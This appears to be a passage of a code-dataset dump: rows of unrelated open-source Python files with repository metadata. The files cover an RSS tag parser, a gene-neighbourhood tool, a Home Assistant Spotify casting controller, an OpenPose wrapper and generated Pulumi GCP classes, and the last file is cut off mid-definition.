blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 4
721
| content_id
stringlengths 40
40
| detected_licenses
listlengths 0
57
| license_type
stringclasses 2
values | repo_name
stringlengths 5
91
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 321
values | visit_date
timestamp[ns]date 2016-08-12 09:31:09
2023-09-06 10:45:07
| revision_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| committer_date
timestamp[ns]date 2010-09-28 14:01:40
2023-09-06 06:22:19
| github_id
int64 426
681M
| star_events_count
int64 101
243k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 23
values | gha_event_created_at
timestamp[ns]date 2012-06-28 18:51:49
2023-09-14 21:59:16
⌀ | gha_created_at
timestamp[ns]date 2008-02-11 22:55:26
2023-08-10 11:14:58
⌀ | gha_language
stringclasses 147
values | src_encoding
stringclasses 26
values | language
stringclasses 2
values | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 6
10.2M
| extension
stringclasses 115
values | filename
stringlengths 3
113
| content
stringlengths 6
10.2M
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
5700766093188bda70fb80b937f4a2f0dcfe753b
|
6189f34eff2831e3e727cd7c5e43bc5b591adffc
|
/WebMirror/management/rss_parser_funcs/feed_parse_extractRufftranslationsWordpressCom.py
|
5d9ea2e8b9a715ba990d39fad1d2f7114738729f
|
[
"BSD-3-Clause"
] |
permissive
|
fake-name/ReadableWebProxy
|
24603660b204a9e7965cfdd4a942ff62d7711e27
|
ca2e086818433abc08c014dd06bfd22d4985ea2a
|
refs/heads/master
| 2023-09-04T03:54:50.043051
| 2023-08-26T16:08:46
| 2023-08-26T16:08:46
| 39,611,770
| 207
| 20
|
BSD-3-Clause
| 2023-09-11T15:48:15
| 2015-07-24T04:30:43
|
Python
|
UTF-8
|
Python
| false
| false
| 1,766
|
py
|
feed_parse_extractRufftranslationsWordpressCom.py
|
def extractRufftranslationsWordpressCom(item):
'''
Parser for 'rufftranslations.wordpress.com'
'''
vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
if frag and not (chp and vol):
chp = frag
frag = None
if not (chp or vol) or "preview" in item['title'].lower():
return None
tagmap = [
('the communication hero with the cool heroine', 'As the Communication Hero, I Formed the World\'s Strongest Party with a Cool Big Sister', 'translated'),
('the pseudo-ninja from another world', 'the pseudo-kunoichi from another world', 'translated'),
('the pseudo-kunoichi from another world', 'the pseudo-kunoichi from another world', 'translated'),
('yuri flags with the heroine', 'When I Reincarnated as the Villainess, I Raised Yuri Flags with the Heroine!?', 'translated'),
('the death flag-breaking villainess', 'I Was Reincarnated As The Villainess Of An Otome Game, But As I Broke The Death Flags With All My Might, The Heroine Opened My Route', 'translated'),
('the small-town girl becomes the demon king', 'An Unemployed Small-Town Girl Pulled Out The Enchanted Sword: She Can\'t Become The Hero, So She\'ll Become the Demon King Instead', 'translated'),
('PRC', 'PRC', 'translated'),
('Loiterous', 'Loiterous', 'oel'),
]
for tagname, name, tl_type in tagmap:
if tagname in item['tags']:
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False
|
1a6de196d1846211de58953af3477294f9ca30e3
|
789e653a9f3c679e02f8f459fb72508aed9537a0
|
/panaroo/get_neighborhood.py
|
0e8a892887487fb2676e6eee4d1fb8acf88dc595
|
[
"MIT"
] |
permissive
|
gtonkinhill/panaroo
|
3df49a4ba546a83dce9d394ee5b27f89e42566f3
|
0d96fc77caa4c87f37bf16e13ad0e09b6e371f96
|
refs/heads/master
| 2023-07-08T20:49:36.096596
| 2023-05-10T16:22:13
| 2023-05-10T16:22:13
| 162,318,186
| 184
| 28
|
MIT
| 2023-06-29T16:43:12
| 2018-12-18T16:43:30
|
Python
|
UTF-8
|
Python
| false
| false
| 4,727
|
py
|
get_neighborhood.py
|
import networkx as nx
from collections import deque, defaultdict
def conv_list(maybe_list):
if not isinstance(maybe_list, list):
maybe_list = [maybe_list]
return (maybe_list)
def get_target(g, gene):
for n, attr in g.nodes(data=True):
if attr["name"] == gene:
return n
raise NameError("Gene ID does not match any in the graph!")
def bfs_with_dist(G, source, depth_limit=None, prev_depth=0, genome=None):
successors = G.neighbors
for e in generic_bfs_edges_with_dist(G, source, successors, depth_limit, genome=genome):
yield e
def generic_bfs_edges_with_dist(G, source, neighbors=None, depth_limit=None, genome=None):
visited = {source}
if depth_limit is None:
depth_limit = len(G)
queue = deque([(source, depth_limit, get_neighbours_with_genome(G, source, genome))])
while queue:
parent, depth_now, children = queue[0]
try:
child = next(children)
if child not in visited:
yield parent, child, depth_limit-depth_now+1
visited.add(child)
if depth_now > 1:
queue.append((child, depth_now - 1, get_neighbours_with_genome(G, child, genome)))
except StopIteration:
queue.popleft()
def get_neighbours_with_genome(G, node, genome):
neighbours = G.neighbors(node)
if genome is None:
return (neighbours)
else:
return (n for n in neighbours if genome in conv_list(G[node][n]['members']))
def get_options():
import argparse
description = 'Explore gene neighbourhood'
parser = argparse.ArgumentParser(description=description,
prog='panaroo-gene-neighbourhood')
parser.add_argument("--gene",
type=str,
required=True,
help="gene of interest")
parser.add_argument("--genome_id",
type=str,
default=None,
help="genome ID of interest (default=ALL)")
parser.add_argument("--graph",
type=str,
required=True,
help="genome graph gml ('final_graph.gml')")
parser.add_argument("--expand_no",
default=5,
help=("lengths of the path that will be expanded on" +
" in a radius the target gene (default=5)"),
type=int)
parser.add_argument("--out", help="output file")
args = parser.parse_args()
return (args)
def main():
args = get_options()
# load graph
G = nx.read_gml(args.graph)
for n in G.nodes():
G.nodes[n]['members'] = set(conv_list(G.nodes[n]['members']))
# find target gene
target = get_target(G, args.gene)
# find target genome id if requested
gid = None
if args.genome_id is not None:
for i, genome in enumerate(G.graph['isolateNames']):
if genome==args.genome_id:
gid = str(i)
if gid is None:
raise NameError("Genome ID does not match any in the graph!")
# write out neighbouring genes and distance from target
# allocate edges to members
mems_to_edges = defaultdict(list)
if gid is None:
msearch = G.nodes[target]['members']
else:
msearch = [int(gid)]
for mem in msearch:
for u,v,d in bfs_with_dist(G, target, depth_limit=args.expand_no, genome=mem):
mems_to_edges[mem].append((u,v))
# find path for each member
paths_to_members = defaultdict(list)
for mem in mems_to_edges:
# create temporary graph
tG = nx.Graph()
tG.add_edges_from(mems_to_edges[mem])
# find largest connected component that contains the target
for c in sorted(nx.connected_components(tG), key=len, reverse=True):
if target in c:
path = sorted(c)
break
# reorder path
spaths = nx.shortest_path_length(tG, source=target)
n = max(spaths, key=spaths.get)
path = [n] + [v for u, v in nx.dfs_edges(tG, source=n)]
paths_to_members[tuple(path)].append(mem)
# write output
with open(args.out, 'w') as outfile:
outfile.write("support\tmembers\tpath\n")
for path in paths_to_members:
outfile.write(str(len(paths_to_members[path])) + "\t")
outfile.write(",".join([G.graph['isolateNames'][m] for m in paths_to_members[path]]) + "\t")
outfile.write(",".join([G.nodes[n]['name'] for n in path]) + "\n")
return
if __name__ == '__main__':
main()
|
0575be2ff3ed5e48e60370a1c1f797033ce23814
|
234d5fc4b0555f54a0ebaa6975c4de555c818308
|
/custom_components/spotcast/spotcast_controller.py
|
a79753e25ae7768f43c8178c0da2d2665b4c8105
|
[
"Apache-2.0"
] |
permissive
|
fondberg/spotcast
|
62df14a00775404feacf4d62600b36f975bc94a0
|
d8816cdee4c6d1724b539f69f5bd5057082d7be3
|
refs/heads/master
| 2023-04-12T19:13:45.479293
| 2023-03-19T21:50:24
| 2023-03-19T21:50:24
| 183,212,377
| 564
| 115
|
Apache-2.0
| 2023-09-08T23:00:14
| 2019-04-24T11:11:28
|
Python
|
UTF-8
|
Python
| false
| false
| 13,881
|
py
|
spotcast_controller.py
|
from __future__ import annotations
import collections
import logging
import random
import time
from asyncio import run_coroutine_threadsafe
from requests import TooManyRedirects
from collections import OrderedDict
from datetime import datetime
import homeassistant.core as ha_core
import pychromecast
import aiohttp
import json
import spotipy
from homeassistant.components.cast.helpers import ChromeCastZeroconf
from homeassistant.exceptions import HomeAssistantError
from .spotify_controller import SpotifyController
from .const import CONF_SP_DC, CONF_SP_KEY
from .helpers import get_cast_devices, get_spotify_devices, get_spotify_media_player
_LOGGER = logging.getLogger(__name__)
class TokenError(Exception):
pass
class SpotifyCastDevice:
"""Represents a spotify device."""
hass = None
castDevice = None
spotifyController = None
def __init__(self, hass: ha_core.HomeAssistant, call_device_name: str, call_entity_id: str) -> None:
"""Initialize a spotify cast device."""
self.hass = hass
# Get device name from either device_name or entity_id
device_name = None
if call_device_name is None:
entity_id = call_entity_id
if entity_id is None:
raise HomeAssistantError(
"Either entity_id or device_name must be specified"
)
entity_states = hass.states.get(entity_id)
if entity_states is None:
_LOGGER.error("Could not find entity_id: %s", entity_id)
else:
device_name = entity_states.attributes.get("friendly_name")
else:
device_name = call_device_name
if device_name is None or device_name.strip() == "":
raise HomeAssistantError("device_name is empty")
# Find chromecast device
self.castDevice = self.getChromecastDevice(device_name)
_LOGGER.debug("Found cast device: %s", self.castDevice)
self.castDevice.wait()
def getChromecastDevice(self, device_name: str) -> None:
# Get cast from discovered devices of cast platform
known_devices = get_cast_devices(self.hass)
_LOGGER.debug("Chromecast devices: %s", known_devices)
cast_info = next(
(
castinfo
for castinfo in known_devices
if castinfo.friendly_name == device_name
),
None,
)
_LOGGER.debug("cast info: %s", cast_info)
if cast_info:
return pychromecast.get_chromecast_from_cast_info(
cast_info.cast_info, ChromeCastZeroconf.get_zeroconf()
)
_LOGGER.error(
"Could not find device %s from hass.data",
device_name,
)
raise HomeAssistantError(
"Could not find device with name {}".format(device_name)
)
def startSpotifyController(self, access_token: str, expires: int) -> None:
sp = SpotifyController(access_token, expires)
self.castDevice.register_handler(sp)
sp.launch_app()
if not sp.is_launched and not sp.credential_error:
raise HomeAssistantError(
"Failed to launch spotify controller due to timeout"
)
if not sp.is_launched and sp.credential_error:
raise HomeAssistantError(
"Failed to launch spotify controller due to credentials error"
)
self.spotifyController = sp
def getSpotifyDeviceId(self, user_id) -> None:
spotify_media_player = get_spotify_media_player(self.hass, user_id)
max_retries = 5
counter = 0
devices_available = None
_LOGGER.debug("Searching for Spotify device: {}".format(self.spotifyController.device))
while counter < max_retries:
devices_available = get_spotify_devices(spotify_media_player)
# Look for device to make sure we can start playback
if devices := devices_available["devices"]:
for device in devices:
if device["id"] == self.spotifyController.device:
_LOGGER.debug("Found matching Spotify device: {}".format(device))
return device["id"]
sleep = random.uniform(1.5, 1.8) ** counter
time.sleep(sleep)
counter = counter + 1
_LOGGER.error(
'No device with id "{}" known by Spotify'.format(
self.spotifyController.device
)
)
_LOGGER.error("Known devices: {}".format(devices_available["devices"]))
raise HomeAssistantError("Failed to get device id from Spotify")
class SpotifyToken:
"""Represents a spotify token for an account."""
hass = None
sp_dc = None
sp_key = None
_access_token = None
_token_expires = 0
def __init__(self, hass: ha_core.HomeAssistant, sp_dc: str, sp_key: str) -> None:
self.hass = hass
self.sp_dc = sp_dc
self.sp_key = sp_key
def ensure_token_valid(self) -> bool:
if float(self._token_expires) > time.time():
return True
self.get_spotify_token()
@property
def access_token(self) -> str:
self.ensure_token_valid()
_LOGGER.debug("expires: %s time: %s", self._token_expires, time.time())
return self._access_token
def get_spotify_token(self) -> tuple[str, int]:
try:
self._access_token, self._token_expires = run_coroutine_threadsafe(
self.start_session(), self.hass.loop
).result()
expires = self._token_expires - int(time.time())
return self._access_token, expires
except TooManyRedirects:
_LOGGER.error("Could not get spotify token. sp_dc and sp_key could be expired. Please update in config.")
raise HomeAssistantError("Expired sp_dc, sp_key")
except (TokenError, Exception): # noqa: E722
raise HomeAssistantError("Could not get spotify token.")
async def start_session(self):
""" Starts session to get access token. """
cookies = {'sp_dc': self.sp_dc, 'sp_key': self.sp_key}
async with aiohttp.ClientSession(cookies=cookies) as session:
headers = {'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36"}
async with session.get('https://open.spotify.com/get_access_token?reason=transport&productType=web_player', allow_redirects=False, headers=headers) as response:
if(response.status != 200):
_LOGGER.info("Unsuccessful token request, received code %i", response.status)
raise TokenError()
data = await response.text()
config = json.loads(data)
access_token = config['accessToken']
expires_timestamp = config['accessTokenExpirationTimestampMs']
expiration_date = int(expires_timestamp) // 1000
return access_token, expiration_date
class SpotcastController:
spotifyTokenInstances = {}
accounts: dict = {}
hass = None
def __init__(self, hass: ha_core.HomeAssistant, sp_dc: str, sp_key: str, accs: collections.OrderedDict) -> None:
if accs:
self.accounts = accs
self.accounts["default"] = OrderedDict([("sp_dc", sp_dc), ("sp_key", sp_key)])
self.hass = hass
def get_token_instance(self, account: str = None) -> any:
"""Get token instance for account"""
if account is None:
account = "default"
dc = self.accounts.get(account).get(CONF_SP_DC)
key = self.accounts.get(account).get(CONF_SP_KEY)
_LOGGER.debug("setting up with account %s", account)
if account not in self.spotifyTokenInstances:
self.spotifyTokenInstances[account] = SpotifyToken(self.hass, dc, key)
return self.spotifyTokenInstances[account]
def get_spotify_client(self, account: str) -> spotipy.Spotify:
return spotipy.Spotify(auth=self.get_token_instance(account).access_token)
def _getSpotifyConnectDeviceId(self, client, device_name):
media_player = get_spotify_media_player(self.hass, client._get("me")["id"])
devices_available = get_spotify_devices(media_player)
for device in devices_available["devices"]:
if device["name"] == device_name:
return device["id"]
return None
def get_spotify_device_id(self, account, spotify_device_id, device_name, entity_id):
# login as real browser to get powerful token
access_token, expires = self.get_token_instance(account).get_spotify_token()
# get the spotify web api client
client = spotipy.Spotify(auth=access_token)
# first, rely on spotify id given in config
if not spotify_device_id:
# if not present, check if there's a spotify connect device with that name
spotify_device_id = self._getSpotifyConnectDeviceId(client, device_name)
if not spotify_device_id:
# if still no id available, check cast devices and launch the app on chromecast
spotify_cast_device = SpotifyCastDevice(
self.hass,
device_name,
entity_id,
)
me_resp = client._get("me")
spotify_cast_device.startSpotifyController(access_token, expires)
# Make sure it is started
spotify_device_id = spotify_cast_device.getSpotifyDeviceId(me_resp["id"])
return spotify_device_id
def play(
self,
client: spotipy.Spotify,
spotify_device_id: str,
uri: str,
random_song: bool,
position: str,
ignore_fully_played: str,
country_code: str = None
) -> None:
_LOGGER.debug(
"Playing URI: %s on device-id: %s",
uri,
spotify_device_id,
)
if uri.find("show") > 0:
show_episodes_info = client.show_episodes(uri, market=country_code)
if show_episodes_info and len(show_episodes_info["items"]) > 0:
if ignore_fully_played:
for episode in show_episodes_info["items"]:
if not episode["resume_point"]["fully_played"]:
episode_uri = episode["external_urls"]["spotify"]
break
else:
episode_uri = show_episodes_info["items"][0]["external_urls"][
"spotify"
]
_LOGGER.debug(
"Playing episode using uris (latest podcast playlist)= for uri: %s",
episode_uri,
)
client.start_playback(device_id=spotify_device_id, uris=[episode_uri])
elif uri.find("episode") > 0:
_LOGGER.debug("Playing episode using uris= for uri: %s", uri)
client.start_playback(device_id=spotify_device_id, uris=[uri])
elif uri.find("track") > 0:
_LOGGER.debug("Playing track using uris= for uri: %s", uri)
client.start_playback(device_id=spotify_device_id, uris=[uri])
else:
if uri == "random":
_LOGGER.debug(
"Cool, you found the easter egg with playing a random playlist"
)
playlists = client.user_playlists("me", 50)
no_playlists = len(playlists["items"])
uri = playlists["items"][random.randint(0, no_playlists - 1)]["uri"]
kwargs = {"device_id": spotify_device_id, "context_uri": uri}
if random_song:
if uri.find("album") > 0:
results = client.album_tracks(uri, market=country_code)
position = random.randint(0, results["total"] - 1)
elif uri.find("playlist") > 0:
results = client.playlist_tracks(uri)
position = random.randint(0, results["total"] - 1)
elif uri.find("collection") > 0:
results = client.current_user_saved_tracks()
position = random.randint(0, results["total"] - 1)
_LOGGER.debug("Start playback at random position: %s", position)
if uri.find("artist") < 1:
kwargs["offset"] = {"position": position}
_LOGGER.debug(
'Playing context uri using context_uri for uri: "%s" (random_song: %s)',
uri,
random_song,
)
client.start_playback(**kwargs)
def get_playlists(self, account: str, playlist_type: str, country_code: str, locale: str, limit: int) -> dict:
client = self.get_spotify_client(account)
resp = {}
if playlist_type == "discover-weekly":
playlist_type = "made-for-x"
if playlist_type == "user" or playlist_type == "default" or playlist_type == "":
resp = client.current_user_playlists(limit=limit)
elif playlist_type == "featured":
resp = client.featured_playlists(
locale=locale,
country=country_code,
timestamp=datetime.now().strftime("%Y-%m-%dT%H:%M:%S"),
limit=limit,
offset=0,
)
resp = resp.get("playlists")
else:
resp = client._get(
"views/" + playlist_type,
content_limit=limit,
locale=locale,
platform="web",
types="album,playlist,artist,show,station",
limit=limit,
offset=0,
)
resp = resp.get("content")
return resp
|
b792f5ab574424a49a059dab5b8a12c5cf71a1b2
|
ab7d5ec2e40b26c33da957210b5d2da77f9b696d
|
/repos/emily-unstable/contents/make.py
|
43d1264ceb0f6347bdcd73f46e59d9dbeabd438d
|
[
"MIT",
"LicenseRef-scancode-public-domain",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
mcclure/bitbucket-backup
|
e49d280363ff7ef687f03473e463865a7ad8a817
|
b6a02ca8decf843fa0a765c842c24e7eccf59307
|
refs/heads/archive
| 2023-01-24T21:15:14.875131
| 2020-02-02T20:56:23
| 2020-02-02T20:56:23
| 237,833,969
| 115
| 6
| null | 2023-01-07T14:24:14
| 2020-02-02T20:43:56
|
C
|
UTF-8
|
Python
| false
| false
| 53
|
py
|
make.py
|
#!/usr/bin/python
execfile("develop/build/make.py")
|
e05cdf3f72ac8c2415bf0219331dad1587668259
|
53c4ec58760768fc9073793cf17cd8c55978c3af
|
/annotator/openpose/__init__.py
|
8c26f1b37dae854f51da938da2fa67a8ef48ce5a
|
[
"Apache-2.0"
] |
permissive
|
HighCWu/ControlLoRA
|
0b6cab829134ed8377f22800b0e1d648ddf573b0
|
3b8481950867f61b2cf072b1f156d84f3363ac20
|
refs/heads/main
| 2023-08-05T08:51:25.864774
| 2023-02-28T13:06:24
| 2023-02-28T13:06:24
| 603,359,062
| 421
| 20
|
Apache-2.0
| 2023-08-02T02:14:40
| 2023-02-18T09:12:15
|
Python
|
UTF-8
|
Python
| false
| false
| 1,957
|
py
|
__init__.py
|
import os
os.environ["KMP_DUPLICATE_LIB_OK"]="TRUE"
import torch
import numpy as np
from . import util
from .body import Body
from .hand import Hand
from annotator.util import annotator_ckpts_path
body_model_path = "https://huggingface.co/lllyasviel/ControlNet/resolve/main/annotator/ckpts/body_pose_model.pth"
hand_model_path = "https://huggingface.co/lllyasviel/ControlNet/resolve/main/annotator/ckpts/hand_pose_model.pth"
class OpenposeDetector:
def __init__(self):
body_modelpath = os.path.join(annotator_ckpts_path, "body_pose_model.pth")
hand_modelpath = os.path.join(annotator_ckpts_path, "hand_pose_model.pth")
if not os.path.exists(hand_modelpath):
from basicsr.utils.download_util import load_file_from_url
load_file_from_url(body_model_path, model_dir=annotator_ckpts_path)
load_file_from_url(hand_model_path, model_dir=annotator_ckpts_path)
self.body_estimation = Body(body_modelpath)
self.hand_estimation = Hand(hand_modelpath)
def __call__(self, oriImg, hand=False):
oriImg = oriImg[:, :, ::-1].copy()
with torch.no_grad():
candidate, subset = self.body_estimation(oriImg)
canvas = np.zeros_like(oriImg)
canvas = util.draw_bodypose(canvas, candidate, subset)
if hand:
hands_list = util.handDetect(candidate, subset, oriImg)
all_hand_peaks = []
for x, y, w, is_left in hands_list:
peaks = self.hand_estimation(oriImg[y:y+w, x:x+w, :])
peaks[:, 0] = np.where(peaks[:, 0] == 0, peaks[:, 0], peaks[:, 0] + x)
peaks[:, 1] = np.where(peaks[:, 1] == 0, peaks[:, 1], peaks[:, 1] + y)
all_hand_peaks.append(peaks)
canvas = util.draw_handpose(canvas, all_hand_peaks)
return canvas, dict(candidate=candidate.tolist(), subset=subset.tolist())
|
16e5ef8902364f6612fb6cc1bcc0f7f61a019736
|
aeef2494b283012ed619870c4275e7d015f4017a
|
/sdk/python/pulumi_gcp/networksecurity/_inputs.py
|
2c6eaabc8b00a32bbb9323b88c306e930087f616
|
[
"BSD-3-Clause",
"MPL-2.0",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-gcp
|
d4fd3f80c3df5290edaf33eb5eafe34e6699d0ff
|
7deea0a50a4ee5ab7bd722a83eca01707e298f85
|
refs/heads/master
| 2023-08-31T07:12:45.921522
| 2023-08-31T06:16:27
| 2023-08-31T06:16:27
| 97,485,806
| 160
| 63
|
Apache-2.0
| 2023-09-14T19:49:36
| 2017-07-17T14:28:37
|
Java
|
UTF-8
|
Python
| false
| false
| 35,400
|
py
|
_inputs.py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = [
'AuthorizationPolicyRuleArgs',
'AuthorizationPolicyRuleDestinationArgs',
'AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs',
'AuthorizationPolicyRuleSourceArgs',
'ClientTlsPolicyClientCertificateArgs',
'ClientTlsPolicyClientCertificateCertificateProviderInstanceArgs',
'ClientTlsPolicyClientCertificateGrpcEndpointArgs',
'ClientTlsPolicyServerValidationCaArgs',
'ClientTlsPolicyServerValidationCaCertificateProviderInstanceArgs',
'ClientTlsPolicyServerValidationCaGrpcEndpointArgs',
'ServerTlsPolicyMtlsPolicyArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaCertificateProviderInstanceArgs',
'ServerTlsPolicyMtlsPolicyClientValidationCaGrpcEndpointArgs',
'ServerTlsPolicyServerCertificateArgs',
'ServerTlsPolicyServerCertificateCertificateProviderInstanceArgs',
'ServerTlsPolicyServerCertificateGrpcEndpointArgs',
]
@pulumi.input_type
class AuthorizationPolicyRuleArgs:
def __init__(__self__, *,
destinations: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]] = None,
sources: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]] destinations: List of attributes for the traffic destination. All of the destinations must match. A destination is a match if a request matches all the specified hosts, ports, methods and headers.
If not set, the action specified in the 'action' field will be applied without any rule checks for the destination.
Structure is documented below.
:param pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]] sources: List of attributes for the traffic source. All of the sources must match. A source is a match if both principals and ipBlocks match.
If not set, the action specified in the 'action' field will be applied without any rule checks for the source.
Structure is documented below.
"""
if destinations is not None:
pulumi.set(__self__, "destinations", destinations)
if sources is not None:
pulumi.set(__self__, "sources", sources)
@property
@pulumi.getter
def destinations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]]:
"""
List of attributes for the traffic destination. All of the destinations must match. A destination is a match if a request matches all the specified hosts, ports, methods and headers.
If not set, the action specified in the 'action' field will be applied without any rule checks for the destination.
Structure is documented below.
"""
return pulumi.get(self, "destinations")
@destinations.setter
def destinations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleDestinationArgs']]]]):
pulumi.set(self, "destinations", value)
@property
@pulumi.getter
def sources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]]:
"""
List of attributes for the traffic source. All of the sources must match. A source is a match if both principals and ipBlocks match.
If not set, the action specified in the 'action' field will be applied without any rule checks for the source.
Structure is documented below.
"""
return pulumi.get(self, "sources")
@sources.setter
def sources(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['AuthorizationPolicyRuleSourceArgs']]]]):
pulumi.set(self, "sources", value)
@pulumi.input_type
class AuthorizationPolicyRuleDestinationArgs:
def __init__(__self__, *,
hosts: pulumi.Input[Sequence[pulumi.Input[str]]],
methods: pulumi.Input[Sequence[pulumi.Input[str]]],
ports: pulumi.Input[Sequence[pulumi.Input[int]]],
http_header_match: Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] hosts: List of host names to match. Matched against the ":authority" header in http requests. At least one host should match. Each host can be an exact match, or a prefix match (example "mydomain.*") or a suffix match (example "*.myorg.com") or a presence (any) match "*".
:param pulumi.Input[Sequence[pulumi.Input[str]]] methods: A list of HTTP methods to match. At least one method should match. Should not be set for gRPC services.
:param pulumi.Input[Sequence[pulumi.Input[int]]] ports: List of destination ports to match. At least one port should match.
:param pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs'] http_header_match: Match against key:value pair in http header. Provides a flexible match based on HTTP headers, for potentially advanced use cases. At least one header should match.
Avoid using header matches to make authorization decisions unless there is a strong guarantee that requests arrive through a trusted client or proxy.
Structure is documented below.
"""
pulumi.set(__self__, "hosts", hosts)
pulumi.set(__self__, "methods", methods)
pulumi.set(__self__, "ports", ports)
if http_header_match is not None:
pulumi.set(__self__, "http_header_match", http_header_match)
@property
@pulumi.getter
def hosts(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
List of host names to match. Matched against the ":authority" header in http requests. At least one host should match. Each host can be an exact match, or a prefix match (example "mydomain.*") or a suffix match (example "*.myorg.com") or a presence (any) match "*".
"""
return pulumi.get(self, "hosts")
@hosts.setter
def hosts(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "hosts", value)
@property
@pulumi.getter
def methods(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of HTTP methods to match. At least one method should match. Should not be set for gRPC services.
"""
return pulumi.get(self, "methods")
@methods.setter
def methods(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "methods", value)
@property
@pulumi.getter
def ports(self) -> pulumi.Input[Sequence[pulumi.Input[int]]]:
"""
List of destination ports to match. At least one port should match.
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: pulumi.Input[Sequence[pulumi.Input[int]]]):
pulumi.set(self, "ports", value)
@property
@pulumi.getter(name="httpHeaderMatch")
def http_header_match(self) -> Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']]:
"""
Match against key:value pair in http header. Provides a flexible match based on HTTP headers, for potentially advanced use cases. At least one header should match.
Avoid using header matches to make authorization decisions unless there is a strong guarantee that requests arrive through a trusted client or proxy.
Structure is documented below.
"""
return pulumi.get(self, "http_header_match")
@http_header_match.setter
def http_header_match(self, value: Optional[pulumi.Input['AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs']]):
pulumi.set(self, "http_header_match", value)
@pulumi.input_type
class AuthorizationPolicyRuleDestinationHttpHeaderMatchArgs:
def __init__(__self__, *,
header_name: pulumi.Input[str],
regex_match: pulumi.Input[str]):
"""
:param pulumi.Input[str] header_name: The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method".
:param pulumi.Input[str] regex_match: The value of the header must match the regular expression specified in regexMatch. For regular expression grammar, please see: en.cppreference.com/w/cpp/regex/ecmascript For matching against a port specified in the HTTP request, use a headerMatch with headerName set to Host and a regular expression that satisfies the RFC2616 Host header's port specifier.
"""
pulumi.set(__self__, "header_name", header_name)
pulumi.set(__self__, "regex_match", regex_match)
@property
@pulumi.getter(name="headerName")
def header_name(self) -> pulumi.Input[str]:
"""
The name of the HTTP header to match. For matching against the HTTP request's authority, use a headerMatch with the header name ":authority". For matching a request's method, use the headerName ":method".
"""
return pulumi.get(self, "header_name")
@header_name.setter
def header_name(self, value: pulumi.Input[str]):
pulumi.set(self, "header_name", value)
@property
@pulumi.getter(name="regexMatch")
def regex_match(self) -> pulumi.Input[str]:
"""
The value of the header must match the regular expression specified in regexMatch. For regular expression grammar, please see: en.cppreference.com/w/cpp/regex/ecmascript For matching against a port specified in the HTTP request, use a headerMatch with headerName set to Host and a regular expression that satisfies the RFC2616 Host header's port specifier.
"""
return pulumi.get(self, "regex_match")
@regex_match.setter
def regex_match(self, value: pulumi.Input[str]):
pulumi.set(self, "regex_match", value)
@pulumi.input_type
class AuthorizationPolicyRuleSourceArgs:
def __init__(__self__, *,
ip_blocks: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
principals: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[Sequence[pulumi.Input[str]]] ip_blocks: List of CIDR ranges to match based on source IP address. At least one IP block should match. Single IP (e.g., "1.2.3.4") and CIDR (e.g., "1.2.3.0/24") are supported. Authorization based on source IP alone should be avoided.
The IP addresses of any load balancers or proxies should be considered untrusted.
:param pulumi.Input[Sequence[pulumi.Input[str]]] principals: List of peer identities to match for authorization. At least one principal should match. Each peer can be an exact match, or a prefix match (example, "namespace/*") or a suffix match (example, "*/service-account") or a presence match "*".
Authorization based on the principal name without certificate validation (configured by ServerTlsPolicy resource) is considered insecure.
"""
if ip_blocks is not None:
pulumi.set(__self__, "ip_blocks", ip_blocks)
if principals is not None:
pulumi.set(__self__, "principals", principals)
@property
@pulumi.getter(name="ipBlocks")
def ip_blocks(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of CIDR ranges to match based on source IP address. At least one IP block should match. Single IP (e.g., "1.2.3.4") and CIDR (e.g., "1.2.3.0/24") are supported. Authorization based on source IP alone should be avoided.
The IP addresses of any load balancers or proxies should be considered untrusted.
"""
return pulumi.get(self, "ip_blocks")
@ip_blocks.setter
